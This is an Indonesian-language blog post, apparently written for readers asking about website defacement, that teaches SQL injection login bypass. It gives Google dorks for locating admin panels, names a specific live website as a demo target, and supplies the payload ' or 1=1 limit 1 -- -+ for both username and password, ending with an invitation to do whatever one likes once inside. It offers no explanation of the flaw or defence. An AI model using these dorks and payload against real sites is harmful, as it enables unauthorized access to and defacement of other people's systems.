Assalamuallaikum sobat :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "
Bypass SQL Login" maksudnya gimana tuh?
Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita
dapat login ke administrator web tersebut tanpa harus memasukan username
dan password yang sudah dibuat admin. Singkatnya sih "
bypass = bye bye password"
Oke langsung saja kita masuk ke tutorialnya :
[#] Dork
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
Drok bisa di kembangin sendiri
[#] Langkah-langkah
1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini
http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+
Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D
untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan
saya perbarui dengan menambah macam erornya dan kenapa bisa masuk